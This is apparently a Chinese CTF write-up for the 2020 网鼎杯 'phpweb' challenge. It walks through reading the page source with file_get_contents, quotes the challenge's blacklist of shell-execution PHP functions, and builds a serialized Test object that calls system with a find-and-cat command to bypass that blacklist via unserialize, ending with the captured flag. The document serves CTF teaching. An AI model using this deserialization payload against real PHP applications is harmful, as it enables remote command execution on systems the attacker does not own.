[网鼎杯 2020 朱雀组]phpweb

打开靶机后发现页面上有一段警告信息

并且上面的时间会随着当前时间的变化而变化

访问页面源代码发现有两个传参点

html 复制代码
<p>2026-01-30 06:45:30 am</p>
<form id=form1 name=form1 action="index.php" method=post>
  <input type=hidden id=func name=func value='date'>
  <input type=hidden id=p name=p value='Y-m-d h:i:s a'>
</form>

这里定义了func参数是一个接收函数,p参数是函数执行后的内容

抓包后发现传入点在请求体中

调用 PHP 中的 file_get_contents 函数读取源代码

题目提示这个网站是用php搭建的

那就尝试构造payload

html 复制代码
func=file_get_contents&p=index.php

file_get_contents()函数

file_get_contents() 函数在文件操作中的主要作用是读取本地文件的内容。

发现成功读取到源代码

对源代码进行代码审计

php 复制代码
$disable_fun = array(
    "exec ", "shell_exec ", "system ", "passthru ", "proc_open ", 
    "show_source ", "phpinfo ", "popen ", "dl ", "eval ", ... // 共30+个危险函数
);
if (in_array($func, $disable_fun)) {
    die("Hacker...");
}

过滤了多个能进行命令注入的函数

并替换成空格收尾

php 复制代码
class Test {
    var $p = "Y-m-d h:i:s a ";
    var $func = "date ";
    function __destruct() {
        if ($this->func != " ") {
            echo gettime($this->func, $this->p); // 动态调用函数
        }
    }
}

function gettime($func, $p) {
    return $func($p); 
}

**__destruct()**在对象销毁时自动触发

gettime() 会执行 func( p),即可控函数调用

利用反序列化进行绕过

黑名单只检查初始func参数,但反序列化后对象属性中的system不会被二次校验

构造一个本地Test对象并以序列化进行输出

php 复制代码
<?php
class Test {
    var $p = "cat $(find / -name flag*)";
    var $func = "system";
}
$testObject = new Test();
$serializedResult = serialize($testObject);
echo $serializedResult;
?>


#O:4:"Test":2:{s:1:"p";s:25:"cat $(find / -name flag*)";s:4:"func";s:6:"system";}

利用unserialize函数进行反序列化注入

payload如下

php 复制代码
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:25:"cat $(find / -name flag*)";s:4:"func";s:6:"system";}

flag{cb6ecf44-2a91-4410-93ec-d53d62844c7f}

参考

2.网鼎杯 2020 朱雀组phpweb

相关推荐
BingoGo20 小时前
PHP 在领域驱动(DDD)设计中的核心实践
后端·php
2601_961194021 天前
考研资料电子版|去哪找|网盘
java·c语言·c++·python·考研·php
嘶哈哈哈1 天前
嘉立创 EDA 入门实操笔记:从原理图到 PCB 布线、差分对、覆铜与 DRC 检查
开发语言·笔记·php
爱装代码的小瓶子1 天前
3. 设计buffer模块
linux·服务器·开发语言·c++·php
狗凯之家源码网1 天前
APP 软件官网整站源码效果实测与价值解析
开源·php
m0_738120721 天前
渗透测试基础——PHP 序列化数据结构与反序列化机制详解
android·服务器·网络·数据结构·安全·php
AC赳赳老秦1 天前
用 OpenClaw 制定技术学习计划:根据目标岗位自动生成学习路线、推荐学习资源
开发语言·c++·人工智能·python·mysql·php·openclaw
宁小法1 天前
Redis evalsha 可能返回的错误类型
redis·php·lua报错
祁白_1 天前
PHP回调函数
web安全·php·ctf·代码审计·writeup
着迷不白1 天前
七、Linux网络管理
服务器·网络·php